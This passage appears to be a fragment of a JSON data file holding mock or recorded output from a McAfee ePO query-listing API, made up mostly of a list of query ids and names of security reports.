    "Output": "\"[{\\r\\n        \\\"id\\\": 1,\\r\\n        \\\"name\\\": \\\"Effective permissions for users\\\",\\r\\n        \\\"description\\\": \\\"Shows all permissions for each user\\\",\\r\\n        \\\"conditionSexp\\\": \\\"Permission Does not equal \\\\\\\"%%NOEPOROLES%%\\\\\\\"\\\",\\r\\n        \\\"groupName\\\": \\\"Permissions\\\",\\r\\n        \\\"userName\\\": \\\"Public\\\",\\r\\n        \\\"databaseType\\\": \\\"\\\",\\r\\n        \\\"target\\\": \\\"EntitlementView\\\",\\r\\n        \\\"createdBy\\\": \\\"admin\\\",\\r\\n        \\\"createdOn\\\": \\\"2022-04-21T16:10:53-07:00\\\",\\r\\n        \\\"modifiedBy\\\": \\\"admin\\\",\\r\\n        \\\"modifiedOn\\\": \\\"2022-04-21T16:10:53-07:00\\\"\\r\\n    } ]\"",
    "id": "\"[\\r\\n\\t\\t\\t1,\\r\\n\\t\\t\\t2,\\r\\n\\t\\t\\t3,\\r\\n\\t\\t\\t4,\\r\\n\\t\\t\\t5,\\r\\n\\t\\t\\t6,\\r\\n\\t\\t\\t7,\\r\\n\\t\\t\\t8,\\r\\n\\t\\t\\t9,\\r\\n\\t\\t\\t10,\\r\\n\\t\\t\\t11,\\r\\n\\t\\t\\t12,\\r\\n\\t\\t\\t13,\\r\\n\\t\\t\\t14,\\r\\n\\t\\t\\t15,\\r\\n\\t\\t\\t16,\\r\\n\\t\\t\\t17,\\r\\n\\t\\t\\t18,\\r\\n\\t\\t\\t19,\\r\\n\\t\\t\\t20,\\r\\n\\t\\t\\t21,\\r\\n\\t\\t\\t50,\\r\\n\\t\\t\\t51,\\r\\n\\t\\t\\t22,\\r\\n\\t\\t\\t23,\\r\\n\\t\\t\\t24,\\r\\n\\t\\t\\t25,\\r\\n\\t\\t\\t26,\\r\\n\\t\\t\\t27,\\r\\n\\t\\t\\t28,\\r\\n\\t\\t\\t29,\\r\\n\\t\\t\\t30,\\r\\n\\t\\t\\t31,\\r\\n\\t\\t\\t32,\\r\\n\\t\\t\\t33,\\r\\n\\t\\t\\t34,\\r\\n\\t\\t\\t35,\\r\\n\\t\\t\\t36,\\r\\n\\t\\t\\t37,\\r\\n\\t\\t\\t38,\\r\\n\\t\\t\\t40,\\r\\n\\t\\t\\t41,\\r\\n\\t\\t\\t42,\\r\\n\\t\\t\\t43,\\r\\n\\t\\t\\t39,\\r\\n\\t\\t\\t52,\\r\\n\\t\\t\\t53,\\r\\n\\t\\t\\t54,\\r\\n\\t\\t\\t55,\\r\\n\\t\\t\\t110,\\r\\n\\t\\t\\t111,\\r\\n\\t\\t\\t112,\\r\\n\\t\\t\\t113,\\r\\n\\t\\t\\t114,\\r\\n\\t\\t\\t115,\\r\\n\\t\\t\\t116,\\r\\n\\t\\t\\t117,\\r\\n\\t\\t\\t118,\\r\\n\\t\\t\\t119,\\r\\n\\t\\t\\t120,\\r\\n\\t\\t\\t121,\\r\\n\\t\\t\\t122,\\r\\n\\t\\t\\t123,\\r\\n\\t\\t\\t125,\\r\\n\\t\\t\\t126,\\r\\n\\t\\t\\t127,\\r\\n\\t\\t\\t124,\\r\\n\\t\\t\\t128,\\r\\n\\t\\t\\t129,\\r\\n\\t\\t\\t130,\\r\\n\\t\\t\\t131,\\r\\n\\t\\t\\t132,\\r\\n\\t\\t\\t133,\\r\\n\\t\\t\\t134,\\r\\n\\t\\t\\t135,\\r\\n\\t\\t\\t136,\\r\\n\\t\\t\\t137,\\r\\n\\t\\t\\t138,\\r\\n\\t\\t\\t139,\\r\\n\\t\\t\\t140,\\r\\n\\t\\t\\t141,\\r\\n\\t\\t\\t142,\\r\\n\\t\\t\\t143,\\r\\n\\t\\t\\t189,\\r\\n\\t\\t\\t286,\\r\\n\\t\\t\\t287,\\r\\n\\t\\t\\t56,\\r\\n\\t\\t\\t57,\\r\\n\\t\\t\\t58,\\r\\n\\t\\t\\t59,\\r\\n\\t\\t\\t60,\\r\\n\\t\\t\\t61,\\r\\n\\t\\t\\t62,\\r\\n\\t\\t\\t63,\\r\\n\\t\\t\\t64,\\r\\n\\t\\t\\t65,\\r\\n\\t\\t\\t66,\\r\\n\\t\\t\\t67,\\r\\n\\t\\t\\t68,\\r\\n\\t\\t\\t69,\\r\\n\\t\\t\\t70,\\r\\n\\t\\t\\t71,\\r\\n\\t\\t\\t72,\\r\\n\\t\\t\\t73,\\r\\n\\t\\t\\t74,\\r\\n\\t\\t\\t75,\\r\\n\\t\\t\\t76,\\r\\n\\t\\t\\t77,\\r\\n\\t\\t\\
t78,\\r\\n\\t\\t\\t79,\\r\\n\\t\\t\\t80,\\r\\n\\t\\t\\t81,\\r\\n\\t\\t\\t82,\\r\\n\\t\\t\\t83,\\r\\n\\t\\t\\t84,\\r\\n\\t\\t\\t85,\\r\\n\\t\\t\\t86,\\r\\n\\t\\t\\t87,\\r\\n\\t\\t\\t88,\\r\\n\\t\\t\\t89,\\r\\n\\t\\t\\t90,\\r\\n\\t\\t\\t91,\\r\\n\\t\\t\\t92,\\r\\n\\t\\t\\t93,\\r\\n\\t\\t\\t94,\\r\\n\\t\\t\\t95,\\r\\n\\t\\t\\t96,\\r\\n\\t\\t\\t281,\\r\\n\\t\\t\\t282,\\r\\n\\t\\t\\t296,\\r\\n\\t\\t\\t297,\\r\\n\\t\\t\\t298,\\r\\n\\t\\t\\t97,\\r\\n\\t\\t\\t98,\\r\\n\\t\\t\\t99,\\r\\n\\t\\t\\t100,\\r\\n\\t\\t\\t101,\\r\\n\\t\\t\\t102,\\r\\n\\t\\t\\t103,\\r\\n\\t\\t\\t104,\\r\\n\\t\\t\\t105,\\r\\n\\t\\t\\t106,\\r\\n\\t\\t\\t107,\\r\\n\\t\\t\\t108,\\r\\n\\t\\t\\t109,\\r\\n\\t\\t\\t316,\\r\\n\\t\\t\\t317,\\r\\n\\t\\t\\t321,\\r\\n\\t\\t\\t322,\\r\\n\\t\\t\\t323,\\r\\n\\t\\t\\t324,\\r\\n\\t\\t\\t325,\\r\\n\\t\\t\\t144,\\r\\n\\t\\t\\t145,\\r\\n\\t\\t\\t146,\\r\\n\\t\\t\\t147,\\r\\n\\t\\t\\t148,\\r\\n\\t\\t\\t149,\\r\\n\\t\\t\\t150,\\r\\n\\t\\t\\t151,\\r\\n\\t\\t\\t152,\\r\\n\\t\\t\\t153,\\r\\n\\t\\t\\t154,\\r\\n\\t\\t\\t155,\\r\\n\\t\\t\\t156,\\r\\n\\t\\t\\t188,\\r\\n\\t\\t\\t326,\\r\\n\\t\\t\\t327,\\r\\n\\t\\t\\t331,\\r\\n\\t\\t\\t333,\\r\\n\\t\\t\\t334,\\r\\n\\t\\t\\t335,\\r\\n\\t\\t\\t283,\\r\\n\\t\\t\\t288,\\r\\n\\t\\t\\t289,\\r\\n\\t\\t\\t290,\\r\\n\\t\\t\\t291,\\r\\n\\t\\t\\t292,\\r\\n\\t\\t\\t293,\\r\\n\\t\\t\\t301,\\r\\n\\t\\t\\t302,\\r\\n\\t\\t\\t304,\\r\\n\\t\\t\\t305,\\r\\n\\t\\t\\t306,\\r\\n\\t\\t\\t328,\\r\\n\\t\\t\\t185,\\r\\n\\t\\t\\t186,\\r\\n\\t\\t\\t187,\\r\\n\\t\\t\\t329,\\r\\n\\t\\t\\t330,\\r\\n\\t\\t\\t361,\\r\\n\\t\\t\\t362,\\r\\n\\t\\t\\t363,\\r\\n\\t\\t\\t364,\\r\\n\\t\\t\\t365,\\r\\n\\t\\t\\t366,\\r\\n\\t\\t\\t367,\\r\\n\\t\\t\\t368,\\r\\n\\t\\t\\t369,\\r\\n\\t\\t\\t370,\\r\\n\\t\\t\\t371,\\r\\n\\t\\t\\t372,\\r\\n\\t\\t\\t373,\\r\\n\\t\\t\\t374,\\r\\n\\t\\t\\t375,\\r\\n\\t\\t\\t376,\\r\\n\\t\\t\\t377,\\r\\n\\t\\t\\t378,\\r\\n\\t\\t\\t380,\\r\\n\\t\\t\\t382,\\r\\n\\t\\t\\t332,\\r\\n\\t\\t\\t336,\\r\\n\\t\\t\\t337,\\r\\n\\t\\t\\t338,\\r\\n\\t\\t\\t339,\\r
\\n\\t\\t\\t340,\\r\\n\\t\\t\\t341,\\r\\n\\t\\t\\t342,\\r\\n\\t\\t\\t343,\\r\\n\\t\\t\\t344,\\r\\n\\t\\t\\t345,\\r\\n\\t\\t\\t346,\\r\\n\\t\\t\\t347,\\r\\n\\t\\t\\t348,\\r\\n\\t\\t\\t349,\\r\\n\\t\\t\\t276,\\r\\n\\t\\t\\t277,\\r\\n\\t\\t\\t350,\\r\\n\\t\\t\\t351,\\r\\n\\t\\t\\t352,\\r\\n\\t\\t\\t353,\\r\\n\\t\\t\\t354,\\r\\n\\t\\t\\t355,\\r\\n\\t\\t\\t356,\\r\\n\\t\\t\\t357,\\r\\n\\t\\t\\t358,\\r\\n\\t\\t\\t359,\\r\\n\\t\\t\\t360,\\r\\n\\t\\t\\t278,\\r\\n\\t\\t\\t279,\\r\\n\\t\\t\\t280,\\r\\n\\t\\t\\t284,\\r\\n\\t\\t\\t285,\\r\\n\\t\\t\\t275,\\r\\n\\t\\t\\t294,\\r\\n\\t\\t\\t295,\\r\\n\\t\\t\\t299,\\r\\n\\t\\t\\t300,\\r\\n\\t\\t\\t303,\\r\\n\\t\\t\\t307,\\r\\n\\t\\t\\t308,\\r\\n\\t\\t\\t309,\\r\\n\\t\\t\\t310,\\r\\n\\t\\t\\t311,\\r\\n\\t\\t\\t312,\\r\\n\\t\\t\\t313,\\r\\n\\t\\t\\t314,\\r\\n\\t\\t\\t315,\\r\\n\\t\\t\\t318,\\r\\n\\t\\t\\t319,\\r\\n\\t\\t\\t320,\\r\\n\\t\\t\\t379,\\r\\n\\t\\t\\t381,\\r\\n\\t\\t\\t383,\\r\\n\\t\\t\\t384,\\r\\n\\t\\t\\t385,\\r\\n\\t\\t\\t386,\\r\\n\\t\\t\\t387,\\r\\n\\t\\t\\t388\\r\\n\\t\\t]\"",
    "name": "\"[\\r\\n\\t\\t\\t\\\"Effective permissions for users\\\",\\r\\n\\t\\t\\t\\\"Permission set details\\\",\\r\\n\\t\\t\\t\\\"Permission set membership\\\",\\r\\n\\t\\t\\t\\\"Failed User Actions in ePO Console within Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Today's Detections per Product\\\",\\r\\n\\t\\t\\t\\\"Systems per Top-Level Group\\\",\\r\\n\\t\\t\\t\\\"Duplicate Systems Names\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent Compliance Summary\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent Compliance History\\\",\\r\\n\\t\\t\\t\\\"Multi-server McAfee Agent Compliance Summary\\\",\\r\\n\\t\\t\\t\\\"Multi-server McAfee Agent Compliance History\\\",\\r\\n\\t\\t\\t\\\"Repository Replication Trend for 2 Months\\\",\\r\\n\\t\\t\\t\\\"Failed logon Attempts in Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Successful logon Attempts in Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Server Configurations by User (30 days)\\\",\\r\\n\\t\\t\\t\\\"Software Configurations by user (30 days)\\\",\\r\\n\\t\\t\\t\\\"Configuration Changes by User (30 days)\\\",\\r\\n\\t\\t\\t\\\"Malware Detection History\\\",\\r\\n\\t\\t\\t\\\"Applied Policies for McAfee Agent \\\",\\r\\n\\t\\t\\t\\\"Applied Policies by Policy Name\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment Change History by User (30 days)\\\",\\r\\n\\t\\t\\t\\\"Agent Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Agent Communication Summary\\\",\\r\\n\\t\\t\\t\\\"Systems with High Sequence Errors\\\",\\r\\n\\t\\t\\t\\\"Systems with no Recent Sequence Errors\\\",\\r\\n\\t\\t\\t\\\"Unmanaged Systems\\\",\\r\\n\\t\\t\\t\\\"Software Manager Failed Installs\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment Broken Inheritance\\\",\\r\\n\\t\\t\\t\\\"Applied Client Tasks\\\",\\r\\n\\t\\t\\t\\\"Client Task Assignment Broken Inheritance\\\",\\r\\n\\t\\t\\t\\\"Product Deployment in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Agent Uninstalls Attempted in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Failed Product Deployment in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Failed Product Updates in the Last 
24 Hours\\\",\\r\\n\\t\\t\\t\\\"Product Updates in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Distributed Repository Status\\\",\\r\\n\\t\\t\\t\\\"New Agents Added to ePO per Week\\\",\\r\\n\\t\\t\\t\\\"Most Numerous Threat Event Descriptions\\\",\\r\\n\\t\\t\\t\\\"Threat Events by System Tree Group\\\",\\r\\n\\t\\t\\t\\\"Threat Event Descriptions in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Product Update Successes and Failures Trend for the last 2 Months\\\",\\r\\n\\t\\t\\t\\\"Inactive Agents\\\",\\r\\n\\t\\t\\t\\\"Systems per Agent Handler\\\",\\r\\n\\t\\t\\t\\\"Agent Handler Status\\\",\\r\\n\\t\\t\\t\\\"Threat Events in the Last 2 Weeks\\\",\\r\\n\\t\\t\\t\\\"Managed Nodes Having Point Product Policy Enforcement Failures\\\",\\r\\n\\t\\t\\t\\\"Managed Nodes Having Point Product Property Collection Failures\\\",\\r\\n\\t\\t\\t\\\"Repository Usage Based On DAT and Engine Pulling\\\",\\r\\n\\t\\t\\t\\\"Repositories and Percentage Utilization\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Web Content Categories that Caused the Most Infections in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Hotfixes Installed\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visits by Rating\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visits by Content\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Downloads by Rating\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Visited Red Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Visited Yellow Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Visited Unrated Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Blocked Red Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Warned-Continued Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Blocked Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 
Sites on Block List\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Sites on Allow List\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visit Log\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Downloads by Action\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Download Log\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Red Sites on Allow List\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top Sites Grouped by Content\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Warned-Cancelled Sites\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visits by Action\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Red Downloads\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Yellow Downloads\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Top 100 Unrated Downloads\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control: Visits by Action Grouped by Content\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Block Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Allow Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Clean Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Block Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Allow Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Clean Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Block Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Allow Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Clean Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Failed User Actions in McAfee ePO Console within Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of 
Incidents per type (data in-use/in-motion)\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Incidents per rule set (data in-use/in-motion)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Installation Status Report\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Threats Detected in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Threats Detected in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Summary of Threats Detected in the Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Summary of Threats Detected in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Primary Vectors of Attack in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Top Infected Users in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Top Threats in the Last 48 Hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Duration before Detection on Endpoints in the Last 2 Weeks\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Top 10 Attacking Systems in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Currently Enabled Technology\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Self Protection Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Policy Compliance by Computer Name\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Policy Compliance by Policy Name\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform: Hotfixes Installed\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Applications with the Most Exploits in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Duration of Completed Full Scans in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Duration of Completed Quick Scans in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Systems Not Completed a Full Scan in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Systems Not Completed a Full Scan in the Last Month\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Access Protection Compliance 
Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: AMCore Content Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Exploit Prevention Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: On-Access Scan Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Content Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Exploit Prevention Content Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Detection Response Summary\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Threats Detected Over the Previous 2 Quarters\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Computers with the Most Detections\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Detected Threats\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Access Protection Rules Broken\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Threat Count by Severity\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Users with the Most Detections\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Threats Per Threat Category\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Threat Sources\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Top 10 Exploits Prevented\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Hotfixes Installed\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: On-Access Scan McAfee GTI Sensitivity Level\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: On-Demand Full Scan McAfee GTI Sensitivity Level\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: On-Demand Quick Scan McAfee GTI Sensitivity Level\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: Right-Click Scan McAfee GTI Sensitivity Level\\\",\\r\\n\\t\\t\\t\\\"DLP: Distribution of DLP products on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"DLP 
Discovery (Endpoint): Local Email Storage Scan Current Status\\\",\\r\\n\\t\\t\\t\\\"DLP: Policy distribution\\\",\\r\\n\\t\\t\\t\\\"DLP: Enforced Rule Sets per endpoint computers\\\",\\r\\n\\t\\t\\t\\\"DLP: Bypassed users\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Intrusion events in the last 24 hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Events in the last 24 hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Events from McAfee GTI in the last 6 months\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Traffic block events in the last 24 hours\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Compliance Status\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Count of Firewall Client Rules\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Client Rules By Process/Port Range\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Client Rules By Process/User\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Client Rules By Process\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Client Rules By Protocol/System Name\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Errors\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Hotfixes Installed\\\",\\r\\n\\t\\t\\t\\\"TIE Server Cleanup Executions Deleting Items\\\",\\r\\n\\t\\t\\t\\\"TIE Server Cleanup Items Deleted By Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Used Suspicious Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Recently Used Suspicious Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Prevalent Suspicious Files Created\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Used Monitored Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Recently Used Monitored Files\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Block Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Allow Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: 
Observation Clean Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Block Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Block Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Allow Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Allow Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Clean Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Clean Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Events by System (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Events by System (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Events by File (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection: Observation Events by File (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention: False Positive Mitigation Events\\\",\\r\\n\\t\\t\\t\\\"TIE Server Most Prevalent Monitored Files Created\\\",\\r\\n\\t\\t\\t\\\"Recently Used ATD Submissions\\\",\\r\\n\\t\\t\\t\\\"TIE Server Connectivity\\\",\\r\\n\\t\\t\\t\\\"TIE Server Appliances per Server Version\\\",\\r\\n\\t\\t\\t\\\"TIE Server Appliances per Agent Version\\\",\\r\\n\\t\\t\\t\\\"TIE Server Appliances per Platform Version\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Current Status\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Latest Status\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Latest Sensitive Files\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Latest Errors\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local File System Scan Latest 
Classifications\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Scan Latest Status\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery (Endpoint): Local Email Scan Latest Sensitive Files\\\",\\r\\n\\t\\t\\t\\\"DLP: Privileged Users\\\",\\r\\n\\t\\t\\t\\\"DLP: Chrome Support Summary\\\",\\r\\n\\t\\t\\t\\\"TIE Server New Certificates by GTI Reputation from Last Week\\\",\\r\\n\\t\\t\\t\\\"TIE Server Malicious or Unidentified Certificates by GTI Reputation from Last Month\\\",\\r\\n\\t\\t\\t\\\"TIE Server Certificates by Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"Recently Used CTD Submissions\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Client Interface Logon Audit Log \\\",\\r\\n\\t\\t\\t\\\"Endpoint Security: Locked Client Systems Due to Failed Password Attempts\\\",\\r\\n\\t\\t\\t\\\"MCP: Endpoint Install Success/Failed events in last month\\\",\\r\\n\\t\\t\\t\\\"TIE Server Appliances per Broker Version\\\",\\r\\n\\t\\t\\t\\\"TIE Server Recently Used Overrides\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Events in the last 24 hours- copy\\\",\\r\\n\\t\\t\\t\\\"Security Incidents (last 14 days) \\\",\\r\\n\\t\\t\\t\\\"OS Distribution\\\",\\r\\n\\t\\t\\t\\\"Data Centers\\\",\\r\\n\\t\\t\\t\\\"Application Reputation\\\",\\r\\n\\t\\t\\t\\\"Anti-Malware Status\\\",\\r\\n\\t\\t\\t\\\"Host Firewall Status\\\",\\r\\n\\t\\t\\t\\\"File Integrity Monitoring Status\\\",\\r\\n\\t\\t\\t\\\"Boot Attestation Status of Hypervisors\\\",\\r\\n\\t\\t\\t\\\"AV protection by product \\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Report\\\",\\r\\n\\t\\t\\t\\\"Endpoint Scan Report\\\",\\r\\n\\t\\t\\t\\\"Security Incidents (last 14 days) \\\",\\r\\n\\t\\t\\t\\\"OS Distribution\\\",\\r\\n\\t\\t\\t\\\"Data Centers\\\",\\r\\n\\t\\t\\t\\\"Anti-Malware Status\\\",\\r\\n\\t\\t\\t\\\"File Integrity Monitoring Status\\\",\\r\\n\\t\\t\\t\\\"Instance Assessment Status\\\",\\r\\n\\t\\t\\t\\\"Host Firewall Status\\\",\\r\\n\\t\\t\\t\\\"vCenter Asset Management Report\\\",\\r\\n\\t\\t\\t\\\"TIE Server 
GTI Refresh\\\",\\r\\n\\t\\t\\t\\\"TIE Server Database Size\\\",\\r\\n\\t\\t\\t\\\"TIE Server New Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server New Overrides\\\",\\r\\n\\t\\t\\t\\\"ATD Reputations\\\",\\r\\n\\t\\t\\t\\\"ATD Submissions\\\",\\r\\n\\t\\t\\t\\\"Most Prevalent ATD Submissions\\\",\\r\\n\\t\\t\\t\\\"New ATD Submissions\\\",\\r\\n\\t\\t\\t\\\"CTD Reputations\\\",\\r\\n\\t\\t\\t\\\"CTD Submissions\\\",\\r\\n\\t\\t\\t\\\"Most Prevalent CTD Submissions\\\",\\r\\n\\t\\t\\t\\\"New CTD Submissions\\\",\\r\\n\\t\\t\\t\\\"Redundant Trusted Overrides\\\",\\r\\n\\t\\t\\t\\\"Redundant Suspicious Overrides\\\",\\r\\n\\t\\t\\t\\\"Conflicting Suspicious Overrides\\\",\\r\\n\\t\\t\\t\\\"DLP: Number of Operational events per day\\\",\\r\\n\\t\\t\\t\\\"DLP: Agent Version\\\",\\r\\n\\t\\t\\t\\\"Conflicting Trusted Overrides\\\",\\r\\n\\t\\t\\t\\\"Unsigned Unknown Files\\\",\\r\\n\\t\\t\\t\\\"TIE Server Unsigned Unknown Files 